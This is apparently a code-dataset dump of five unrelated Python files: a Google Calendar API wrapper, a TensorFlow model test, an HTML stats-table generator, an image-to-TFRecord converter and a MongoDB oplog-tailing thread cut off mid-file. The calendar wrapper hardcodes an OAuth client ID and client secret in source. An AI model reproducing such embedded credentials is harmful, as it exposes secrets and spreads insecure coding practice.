repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
felixb/v2gcalendar | v2gcalendar/calendar_service.py | 1 | 3566 | __author__ = 'flx'
from apiclient.discovery import build
import httplib2
from oauth2client import tools
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.file import Storage
from oauth2client.tools import run_flow
# For this example, the client id and client secret are command-line arguments.
client_id = \
'826222712854-das8sdv4veehjje2o4e45sbvnrd8fi5n.apps.googleusercontent.com'
client_secret = 'CKBI_J4aE7QaEWLTxTyjGF-u'
# The scope URL for read/write access to a user's calendar data
scope = 'https://www.googleapis.com/auth/calendar'
# Create a flow object. This object holds the client_id, client_secret, and
# scope. It assists with OAuth 2.0 steps to get user authorization and
# credentials.
flow = OAuth2WebServerFlow(client_id, client_secret, scope)
class CalendarService:
def __init__(self):
self._service = None
self.init_service()
def init_service(self):
if self._service:
return
storage = Storage('credentials.dat')
credentials = storage.get()
if not credentials or credentials.invalid:
parser = tools.argparser
flags = parser.parse_args([])
credentials = run_flow(flow, storage, flags)
http = httplib2.Http()
http = credentials.authorize(http)
self._service = build('calendar', 'v3', http=http)
def get_calendars(self):
result = []
request = self._service.calendarList().list()
while request:
response = request.execute()
for calendar in response.get('items', []):
result.append(calendar)
request = self._service.calendarList().list_next(request, response)
return result
def find_calendar(self, name):
calendars = self.get_calendars()
for calendar in calendars:
if calendar['summary'] == name:
return calendar['id']
def clear(self, calendar_id):
request = self._service.calendars().clear(calendarId=calendar_id)
result = request.execute()
return result
def get_events(self, calendar_id, show_deleted=False):
results = []
request = self._service.events().list(calendarId=calendar_id,
showDeleted=show_deleted)
while request:
response = request.execute()
for event in response.get('items', []):
results.append(event)
request = self._service.events().list_next(request, response)
return results
def add_event(self, calendar_id, event):
response = self._service.events().insert(calendarId=calendar_id,
body=event,
sendNotifications=False)\
.execute()
return response
def update_event(self, calendar_id, event):
response = self._service.events().update(calendarId=calendar_id,
eventId=event['id'],
body=event,
sendNotifications=False)\
.execute()
return response
def delete_event(self, calendar_id, event_id):
response = self._service.events().delete(calendarId=calendar_id,
eventId=event_id,
sendNotifications=False)\
.execute()
return response
| apache-2.0 | -2,096,562,204,030,105,600 | 35.387755 | 79 | 0.579641 | false | 4.479899 | false | false | false |
google/uncertainty-baselines | uncertainty_baselines/models/wide_resnet_condconv_test.py | 1 | 2177 | # coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for WRN 28-10 with Monte Carlo dropout."""
import tensorflow as tf
import uncertainty_baselines as ub
class WideResnetCondConvTest(tf.test.TestCase):
def testWideResnetCondConv(self):
tf.random.set_seed(83922)
dataset_size = 15
batch_size = 5
input_shape = (32, 32, 1)
num_classes = 2
features = tf.random.normal((dataset_size,) + input_shape)
coeffs = tf.random.normal([tf.reduce_prod(input_shape), num_classes])
net = tf.reshape(features, [dataset_size, -1])
logits = tf.matmul(net, coeffs)
labels = tf.random.categorical(logits, 1)
dataset = tf.data.Dataset.from_tensor_slices((features, labels))
dataset = dataset.repeat().shuffle(dataset_size).batch(batch_size)
model = ub.models.wide_resnet_condconv(
input_shape=input_shape,
depth=10,
width_multiplier=1,
num_classes=num_classes,
l2=0.,
num_experts=5,
per_core_batch_size=batch_size,
use_cond_dense=True,
reduce_dense_outputs=True,
cond_placement='all',
routing_fn='softmax',
normalize_routing=False,
normalize_dense_routing=False,
top_k=-1,
routing_pooling='flatten')
model.compile(
'adam',
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True))
history = model.fit(
dataset, steps_per_epoch=dataset_size // batch_size, epochs=2)
loss_history = history.history['loss']
self.assertAllGreaterEqual(loss_history, 0.)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 8,842,494,253,316,627,000 | 31.984848 | 77 | 0.678916 | false | 3.586491 | true | false | false |
salmoni/Salstat | tabler.py | 1 | 7586 | """
tabler.py
Creates tables in HTML for Salstat
Submit a list of [heading: value] pairs in the desired order
p-values are automatically formatted as %1.6f (all other floats as %5.3f?)
The first two routines are generic and for single answer results.
Following are a handful of tabler functions for particular tests
(c) 2013, Alan James Salmoni
"""
def tableANOVAWithin(results):
ln1 = '<table class="table table-striped"><tr>\n'
headhtml = '<tr><th>Variable</th><th>Source</th><th>Sum of squares</th><th>DF</th><th>Mean square</th><th>F</th><th>p</th></tr>\n'
l1vars = ("Name",results["SSbet"],results["DFbet"],results["MSbet"],results["F"],results["p"])
l2vars = (results["SSwit"],results["DFwit"],results["MSwit"])
l3vars = (results["SSres"],results["DFres"],results["MSres"])
l4vars = (results["SSint"])
l5vars = (results["SStot"],results["DFtot"])
line1 = '<tr><td>%s</td><td>Between groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td>%.3f</td><td>%1.4f</td></tr>\n'%(l1vars)
line2 = '<tr><td></td><td>Within groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td></td><td></td></tr>\n'%(l2vars)
line3 = '<tr><td></td><td>Residual</td><td>%.3f</td><td>%d</td><td>%.3f</td><td></td><td></td></tr>\n'%(l3vars)
line4 = '<tr><td></td><td>Interaction</td><td>%.3f</td><td></td><td></td><td></td><td></td></tr>\n'%(l4vars)
line5 = '<tr><td></td><td>Total</td><td>%.3f</td><td>%d</td><td></td><td></td><td></td></tr>\n'%(l5vars)
line = ln1+headhtml+line1+line3+line4+line2+line5+'</table>'
return line
def tableANOVABetween(results):
ln1 = '<table class="table table-striped"><tr>\n'
headhtml = '<tr><th>Variable</th><th>Source</th><th>Sum of squares</th><th>DF</th><th>Mean square</th><th>F</th><th>p</th></tr>\n'
l1vars = ("Name",results["SSbet"],results["DFbet"],results["MSbet"],results["F"],results["p"])
l2vars = (results["SSwit"],results["DFerr"],results["MSerr"])
l3vars = (results["SStot"],results["DFtot"])
line1 = '<tr><td>%s</td><td>Between groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td>%.3f</td><td>%1.4f</td></tr>\n'%(l1vars)
line2 = '<tr><td></td><td>Within groups</td><td>%.3f</td><td>%d</td><td>%.3f</td></tr>\n'%(l2vars)
line3 = '<tr><td></td><td>Total</td><td>%.3f</td><td>%d</td></tr>\n'%(l3vars)
line = ln1+headhtml+line1+line2+line3+'</table>'
return line
def table(ListofLists):
ln1 = '<table class="table table-striped"><tr>'
ln2 = '<tr>'
for List in ListofLists:
key = List[0]
val = List[1]
headhtml = '<th>%s</th>'%key
if key == 'p':
try:
foothtml = '<td>%1.6f</td>'%val
except TypeError:
foothtml = '<td>n/a</td>'
elif type(val) is int:
foothtml = '<td>%d</td>'%val
elif (type(val) is str):
foothtml = '<td>%s</td>'%val
#elif type(val) is float:
else:
fltstr = str(val)
foothtml = '<td>%s</td>'%fltstr
# really need to figure out what parameters make a good display for each number
ln1 = ln1 + headhtml
ln2 = ln2 + foothtml
ln1 = ln1 + '</tr>' + ln2 + '</tr>\n</table>\n'
return ln1
def vtable(List):
key = List[0]
vals = List[1:]
btn_id = ' id="%s"'%key
chartbutton = '<a class="btn btn-mini dropdown-toggle"%s data-toggle="dropdown" \
href="#">Chart</a>\n'%btn_id
linehtml = '<tr><td>%s</td>'%(key)
for val in vals:
if key == 'p':
try:
linehtml = '<td>%1.6f</td>'%val
except TypeError:
linehtml = '<td>n/a</td>'
elif type(val) is int:
linehtml = linehtml + '<td>%d</td>'%val
elif (type(val) is str):
linehtml = linehtml + '<td>%s</td>'%val
elif type(val) is float:
linehtml = linehtml + '<td>%s</td>'%str(val)
elif type(val) is tuple:
print ("TUPLE!", val)
else:
try:
linehtml = linehtml + '<td>%s</td>'%str(val)
except:
pass
linehtml = linehtml + '</tr>\n'
return linehtml
def tableHinges(List):
key = List[0]
vals = List[1:]
linehtml = '<tr><td>%s</td>'%(key)
for val in vals:
linehtml += '<td>%s, %s</td>'%(str(val[0]), str(val[1]))
linehtml += '</tr>\n'
return linehtml
def tableMultiples(vals, varName):
table = '<h3>%s</h3><table class="table table-striped">\n'%varName
table += '\t<tr><th>Value</th>'
try:
if vals['freqs']:
table += '<th>Frequencies</th>'
except ValueError:
table += '<th>Frequencies</th>'
try:
if vals['props']:
table += '<th>Proportions</th>'
except ValueError:
table += '<th>Proportions</th>'
try:
if vals['percs']:
table += '<th>Percentages</th>'
except ValueError:
table += '<th>Percentages</th>'
table += '</tr>\n'
N = len(vals['values'])
for idx in range(N):
table += '\t<tr><td>%s</td>'%vals['values'][idx]
try:
if vals['freqs']:
table += '<td>%s</td>'%vals['freqs'][idx]
except ValueError:
table += '<td>%s</td>'%vals['freqs'][idx]
try:
if vals['props']:
table += '<td>%s</td>'%vals['props'][idx]
except ValueError:
table += '<td>%s</td>'%vals['props'][idx]
try:
if vals['percs']:
table += '<td>%s %%</td>'%vals['percs'][idx]
except ValueError:
table += '<td>%s %%</td>'%vals['percs'][idx]
table += '</tr>\n'
table += '</table>\n'
return table
def tableFrequencies(List):
table = '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Frequency</th></tr>\n'
for var in List:
values = var[0]
freqs = var[1]
table += '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Frequency</th></tr>\n'
for idx, row in enumerate(values):
table += '\t<tr><td>%s</td><td>%s</td></tr>\n'%(str(row),str(freqs[idx]))
table += '</table>\n'
return table
def tableProportions(List):
"""
Passes two arrays in a list:
array 1 = value
array 2 = corresponding proportions
"""
table = ''
for turn in List:
vals = turn[0]
props = turn[1]
table += '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Proportion</th></tr>\n'
for idx, val in enumerate(vals):
table += '\t<tr><td>%s</td><td>%s</td></tr>\n'%(str(val),str(props[idx]))
table += '</table>\n'
return table
def tableMode(List):
"""
Produces a table to display modes.
Passed are two arrays:
1 = frequency
2 = modal values
"""
table = '<h3>Mode</h3>\n<table class="table table-striped">\n'
table += '\t<tr><th>Frequency</th><th>Modal values</th></tr>\n'
for turn in List:
freq = turn[0]
vals = turn[1]
table += '\t<tr><td>%s</td><td>%s<br />'%(str(freq), str(vals[0]))
for idx in range(1, len(vals)):
table += '\t%s<br />\n'%(str(vals[idx]))
table += '</td></tr>\n\t<tr><td></td><td></td></tr>\n'
table += '</table>\n'
return table
if __name__ == '__main__':
a1 = ['Variable 1','Var001']
a2 = ['Variable 2','Var002']
a3 = ['df',99]
a4 = ['t',30.0001]
a5 = ['p',0.003]
a = [a1,a2,a3,a4,a5]
print (table(a))
| gpl-2.0 | 5,365,793,006,503,404,000 | 36.004878 | 134 | 0.521355 | false | 2.985439 | false | false | false |
velastin/UAndes | convert_to_records.py | 1 | 7327 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Downloads and converts Flowers data to TFRecords of TF-Example protos.
This module downloads the Flowers data, uncompresses it, reads the files
that make up the Flowers data and creates two TFRecord datasets: one for train
and one for test. Each TFRecord dataset is comprised of a set of TF-Example
protocol buffers, each of which contain a single image and label.
The script should take about a minute to run.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os
import random
import sys
import argparse
import tensorflow as tf
from datasets import dataset_utils
# The number of images in the validation set.
_NUM_VALIDATION = 350
# Seed for repeatability.
_RANDOM_SEED = 0
# The number of shards per dataset split.
_NUM_SHARDS = 5
class ImageReader(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Initializes function that decodes RGB JPEG data.
self._decode_png_data = tf.placeholder(dtype=tf.string)
self._decode_png = tf.image.decode_png(self._decode_png_data, channels=3)
def read_image_dims(self, sess, image_data):
image = self.decode_png(sess, image_data)
return image.shape[0], image.shape[1]
def decode_png(self, sess, image_data):
image = sess.run(self._decode_png,
feed_dict={self._decode_png_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _get_filenames_and_classes(dataset_dir):
"""Returns a list of filenames and inferred class names.
Args:
dataset_dir: A directory containing a set of subdirectories representing
class names. Each subdirectory should contain PNG or JPG encoded images.
Returns:
A list of image file paths, relative to `dataset_dir` and the list of
subdirectories, representing class names.
"""
pedestrian_root = os.path.join(dataset_dir, 'pedestrian_photos')
directories = []
class_names = []
for filename in os.listdir(pedestrian_root):
path = os.path.join(pedestrian_root, filename)
if os.path.isdir(path):
directories.append(path)
class_names.append(filename)
photo_filenames = []
for directory in directories:
for filename in os.listdir(directory):
path = os.path.join(directory, filename)
photo_filenames.append(path)
return photo_filenames, sorted(class_names)
def _get_dataset_filename(dataset_dir, split_name, shard_id):
output_filename = 'pedestrian_%s_%05d-of-%05d.tfrecord' % (
split_name, shard_id, _NUM_SHARDS)
return os.path.join(dataset_dir, output_filename)
def _convert_dataset(split_name, filenames, class_names_to_ids, dataset_dir):
"""Converts the given filenames to a TFRecord dataset.
Args:
split_name: The name of the dataset, either 'train' or 'validation'.
filenames: A list of absolute paths to png or jpg images.
class_names_to_ids: A dictionary from class names (strings) to ids
(integers).
dataset_dir: The directory where the converted datasets are stored.
"""
assert split_name in ['train', 'validation']
num_per_shard = int(math.ceil(len(filenames) / float(_NUM_SHARDS)))
with tf.Graph().as_default():
image_reader = ImageReader()
with tf.Session('') as sess:
for shard_id in range(_NUM_SHARDS):
output_filename = _get_dataset_filename(
dataset_dir, split_name, shard_id)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
start_ndx = shard_id * num_per_shard
end_ndx = min((shard_id+1) * num_per_shard, len(filenames))
for i in range(start_ndx, end_ndx):
sys.stdout.write('\r>> Converting image %d/%d shard %d' % (
i+1, len(filenames), shard_id))
sys.stdout.flush()
# Read the filename:
image_data = tf.gfile.FastGFile(filenames[i], 'rb').read()
height, width = image_reader.read_image_dims(sess, image_data)
class_name = os.path.basename(os.path.dirname(filenames[i]))
class_id = class_names_to_ids[class_name]
example = dataset_utils.image_to_tfexample(
image_data, b'png', height, width, class_id)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('\n')
sys.stdout.flush()
def _clean_up_temporary_files(dataset_dir):
"""Removes temporary files used to create the dataset.
Args:
dataset_dir: The directory where the temporary files are stored.
"""
filename = _DATA_URL.split('/')[-1]
filepath = os.path.join(dataset_dir, filename)
tf.gfile.Remove(filepath)
tmp_dir = os.path.join(dataset_dir, 'pedestrian_photos')
tf.gfile.DeleteRecursively(tmp_dir)
def _dataset_exists(dataset_dir):
for split_name in ['train', 'validation']:
for shard_id in range(_NUM_SHARDS):
output_filename = _get_dataset_filename(
dataset_dir, split_name, shard_id)
if not tf.gfile.Exists(output_filename):
return False
return True
def run(dataset_dir):
"""Runs the download and conversion operation.
Args:
dataset_dir: The dataset directory where the dataset is stored.
"""
if not tf.gfile.Exists(dataset_dir):
tf.gfile.MakeDirs(dataset_dir)
if _dataset_exists(dataset_dir):
print('Dataset files already exist. Exiting without re-creating them.')
return
photo_filenames, class_names = _get_filenames_and_classes(dataset_dir)
class_names_to_ids = dict(zip(class_names, range(len(class_names))))
# Divide into train and test:
random.seed(_RANDOM_SEED)
random.shuffle(photo_filenames)
training_filenames = photo_filenames[_NUM_VALIDATION:]
validation_filenames = photo_filenames[:_NUM_VALIDATION]
# First, convert the training and validation sets.
_convert_dataset('train', training_filenames, class_names_to_ids,
dataset_dir)
_convert_dataset('validation', validation_filenames, class_names_to_ids,
dataset_dir)
# Finally, write the labels file:
labels_to_class_names = dict(zip(range(len(class_names)), class_names))
dataset_utils.write_label_file(labels_to_class_names, dataset_dir)
#_clean_up_temporary_files(dataset_dir)
print('\nFinished converting the Flowers dataset!')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='convert dataset to tf records')
parser.add_argument('dataset_dir', help='path to the dataset')
args = parser.parse_args()
run(args.dataset_dir)
| gpl-3.0 | -1,976,234,764,730,661,400 | 29.529167 | 80 | 0.684318 | false | 3.702375 | false | false | false |
gwaller/mongo-connector | mongo_connector/oplog_manager.py | 1 | 30523 | # Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import pymongo
import sys
import time
import threading
import traceback
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.util import retry_until_ok
from pymongo import MongoClient
class OplogThread(threading.Thread):
"""OplogThread gathers the updates for a single oplog.
"""
def __init__(self, primary_conn, main_address, oplog_coll, is_sharded,
doc_manager, oplog_progress_dict, namespace_set, auth_key,
auth_username, repl_set=None, collection_dump=True,
batch_size=DEFAULT_BATCH_SIZE, fields=None,
dest_mapping={}, continue_on_error=False):
"""Initialize the oplog thread.
"""
super(OplogThread, self).__init__()
self.batch_size = batch_size
#The connection to the primary for this replicaSet.
self.primary_connection = primary_conn
#Boolean chooses whether to dump the entire collection if no timestamp
# is present in the config file
self.collection_dump = collection_dump
#The mongos for sharded setups
#Otherwise the same as primary_connection.
#The value is set later on.
self.main_connection = None
#The connection to the oplog collection
self.oplog = oplog_coll
#Boolean describing whether the cluster is sharded or not
self.is_sharded = is_sharded
#A document manager for each target system.
#These are the same for all threads.
if type(doc_manager) == list:
self.doc_managers = doc_manager
else:
self.doc_managers = [doc_manager]
#Boolean describing whether or not the thread is running.
self.running = True
#Stores the timestamp of the last oplog entry read.
self.checkpoint = None
#A dictionary that stores OplogThread/timestamp pairs.
#Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
#The set of namespaces to process from the mongo cluster.
self.namespace_set = namespace_set
#The dict of source namespaces to destination namespaces
self.dest_mapping = dest_mapping
#Whether the collection dump gracefully handles exceptions
self.continue_on_error = continue_on_error
#If authentication is used, this is an admin password.
self.auth_key = auth_key
#This is the username used for authentication.
self.auth_username = auth_username
# Set of fields to export
self._fields = set(fields) if fields else None
logging.info('OplogThread: Initializing oplog thread')
if is_sharded:
self.main_connection = MongoClient(main_address)
else:
self.main_connection = MongoClient(main_address,
replicaSet=repl_set)
self.oplog = self.main_connection['local']['oplog.rs']
if auth_key is not None:
#Authenticate for the whole system
self.primary_connection['admin'].authenticate(
auth_username, auth_key)
self.main_connection['admin'].authenticate(
auth_username, auth_key)
if not self.oplog.find_one():
err_msg = 'OplogThread: No oplog for thread:'
logging.warning('%s %s' % (err_msg, self.primary_connection))
@property
def fields(self):
return self._fields
@fields.setter
def fields(self, value):
if value:
self._fields = set(value)
# Always include _id field
self._fields.add('_id')
else:
self._fields = None
def run(self):
"""Start the oplog worker.
"""
logging.debug("OplogThread: Run thread started")
while self.running is True:
logging.debug("OplogThread: Getting cursor")
cursor = self.init_cursor()
logging.debug("OplogThread: Got the cursor, go go go!")
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
logging.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
continue
#The only entry is the last one we processed
if cursor is None or util.retry_until_ok(cursor.count) == 1:
logging.debug("OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping.")
time.sleep(1)
continue
last_ts = None
err = False
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
logging.debug("OplogThread: about to process new oplog "
"entries")
while cursor.alive and self.running:
logging.debug("OplogThread: Cursor is still"
" alive and thread is still running.")
for n, entry in enumerate(cursor):
logging.debug("OplogThread: Iterating through cursor,"
" document number in this cursor is %d"
% n)
# Break out if this thread should stop
if not self.running:
break
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
continue
# Take fields out of the oplog entry that
# shouldn't be replicated. This may nullify
# the document if there's nothing to do.
if not self.filter_oplog_entry(entry):
continue
#sync the current oplog operation
operation = entry['op']
ns = entry['ns']
# use namespace mapping if one exists
ns = self.dest_mapping.get(entry['ns'], ns)
for docman in self.doc_managers:
try:
logging.debug("OplogThread: Operation for this "
"entry is %s" % str(operation))
# Remove
if operation == 'd':
entry['_id'] = entry['o']['_id']
entry['ns'] = ns
docman.remove(entry)
remove_inc += 1
# Insert
elif operation == 'i': # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get('o')
# Extract timestamp and namespace
doc['_ts'] = util.bson_ts_to_long(
entry['ts'])
doc['ns'] = ns
docman.upsert(doc)
upsert_inc += 1
# Update
elif operation == 'u':
doc = {"_id": entry['o2']['_id'],
"_ts": util.bson_ts_to_long(
entry['ts']),
"ns": ns}
# 'o' field contains the update spec
docman.update(doc, entry.get('o', {}))
update_inc += 1
except errors.OperationFailed:
logging.exception(
"Unable to process oplog document %r"
% entry)
except errors.ConnectionFailed:
logging.exception(
"Connection failed while processing oplog "
"document %r" % entry)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
logging.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far" % (
remove_inc, upsert_inc, update_inc))
logging.debug("OplogThread: Doc is processed.")
last_ts = entry['ts']
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1 and last_ts is not None:
self.checkpoint = last_ts
self.update_checkpoint()
# update timestamp after running through oplog
if last_ts is not None:
logging.debug("OplogThread: updating checkpoint after"
"processing new oplog entries")
self.checkpoint = last_ts
self.update_checkpoint()
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
logging.exception(
"Cursor closed due to an exception. "
"Will attempt to reconnect.")
err = True
if err is True and self.auth_key is not None:
self.primary_connection['admin'].authenticate(
self.auth_username, self.auth_key)
self.main_connection['admin'].authenticate(
self.auth_username, self.auth_key)
err = False
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
logging.debug("OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread.")
self.checkpoint = last_ts
self.update_checkpoint()
logging.debug("OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d"
% (remove_inc, upsert_inc, update_inc))
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
logging.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
def filter_oplog_entry(self, entry):
"""Remove fields from an oplog entry that should not be replicated."""
if not self._fields:
return entry
def pop_excluded_fields(doc):
for key in set(doc) - self._fields:
doc.pop(key)
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry['op'] == 'i':
pop_excluded_fields(entry['o'])
# 'u' indicates an update. 'o' field is the update spec.
elif entry['op'] == 'u':
pop_excluded_fields(entry['o'].get("$set", {}))
pop_excluded_fields(entry['o'].get("$unset", {}))
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry['o'] and not entry['o']['$set']:
entry['o'].pop("$set")
if "$unset" in entry['o'] and not entry['o']['$unset']:
entry['o'].pop("$unset")
if not entry['o']:
return None
return entry
def get_oplog_cursor(self, timestamp):
"""Move cursor to the proper place in the oplog.
"""
logging.debug("OplogThread: Getting the oplog cursor and moving it "
"to the proper place in the oplog.")
if timestamp is None:
return None
cursor, cursor_len = None, 0
while (True):
try:
logging.debug("OplogThread: Getting the oplog cursor "
"in the while true loop for get_oplog_cursor")
if not self.namespace_set:
cursor = self.oplog.find(
{'ts': {'$gte': timestamp}},
tailable=True, await_data=True
)
else:
cursor = self.oplog.find(
{'ts': {'$gte': timestamp},
'ns': {'$in': self.namespace_set}},
tailable=True, await_data=True
)
# Applying 8 as the mask to the cursor enables OplogReplay
cursor.add_option(8)
logging.debug("OplogThread: Cursor created, getting a count.")
cursor_len = cursor.count()
logging.debug("OplogThread: Count is %d" % cursor_len)
break
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
pass
if cursor_len == 0:
logging.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor")
#rollback, we are past the last element in the oplog
timestamp = self.rollback()
logging.info('Finished rollback')
return self.get_oplog_cursor(timestamp)
first_oplog_entry = retry_until_ok(lambda: cursor[0])
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry.get("ts"))
given_ts_long = util.bson_ts_to_long(timestamp)
if cursor_ts_long > given_ts_long:
# first entry in oplog is beyond timestamp, we've fallen behind!
return None
elif cursor_len == 1: # means we are the end of the oplog
self.checkpoint = timestamp
#to commit new TS after rollbacks
return cursor
elif cursor_len > 1:
doc = retry_until_ok(next, cursor)
if timestamp == doc['ts']:
return cursor
else: # error condition
logging.error('OplogThread: %s Bad timestamp in config file'
% self.oplog)
return None
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
dump_set = self.namespace_set or []
logging.debug("OplogThread: Dumping set of collections %s " % dump_set)
#no namespaces specified
if not self.namespace_set:
db_list = retry_until_ok(self.main_connection.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.main_connection[database].collection_names)
for coll in coll_list:
if coll.startswith("system"):
continue
namespace = "%s.%s" % (database, coll)
dump_set.append(namespace)
timestamp = util.retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
def docs_to_dump():
for namespace in dump_set:
logging.info("OplogThread: dumping collection %s"
% namespace)
database, coll = namespace.split('.', 1)
last_id = None
attempts = 0
# Loop to handle possible AutoReconnect
while attempts < 60:
target_coll = self.main_connection[database][coll]
if not last_id:
cursor = util.retry_until_ok(
target_coll.find,
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
else:
cursor = util.retry_until_ok(
target_coll.find,
{"_id": {"$gt": last_id}},
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
try:
for doc in cursor:
if not self.running:
raise StopIteration
doc["ns"] = self.dest_mapping.get(
namespace, namespace)
doc["_ts"] = long_ts
last_id = doc["_id"]
yield doc
break
except pymongo.errors.AutoReconnect:
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_inserted = 0
num_failed = 0
for num, doc in enumerate(docs_to_dump()):
if num % 10000 == 0:
logging.debug("Upserted %d docs." % num)
try:
dm.upsert(doc)
num_inserted += 1
except Exception:
if self.continue_on_error:
logging.exception(
"Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
logging.debug("Upserted %d docs" % num_inserted)
if num_failed > 0:
logging.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
dm.bulk_upsert(docs_to_dump())
except Exception as e:
if self.continue_on_error:
logging.exception("OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially")
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
# Bulk upsert if possible
if hasattr(dm, "bulk_upsert"):
logging.debug("OplogThread: Using bulk upsert function for "
"collection dump")
upsert_all(dm)
else:
logging.debug(
"OplogThread: DocManager %s has no "
"bulk_upsert method. Upserting documents "
"serially for collection dump." % str(dm))
upsert_each(dm)
except:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
klass, value, trace = errors.get_nowait()
dump_success = False
traceback.print_exception(klass, value, trace)
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
logging.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
return None
return timestamp
def get_last_oplog_timestamp(self):
"""Return the timestamp of the latest entry in the oplog.
"""
if not self.namespace_set:
curr = self.oplog.find().sort(
'$natural', pymongo.DESCENDING
).limit(1)
else:
curr = self.oplog.find(
{'ns': {'$in': self.namespace_set}}
).sort('$natural', pymongo.DESCENDING).limit(1)
if curr.count(with_limit_and_skip=True) == 0:
return None
logging.debug("OplogThread: Last oplog entry has timestamp %d."
% curr[0]['ts'].time)
return curr[0]['ts']
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
"""
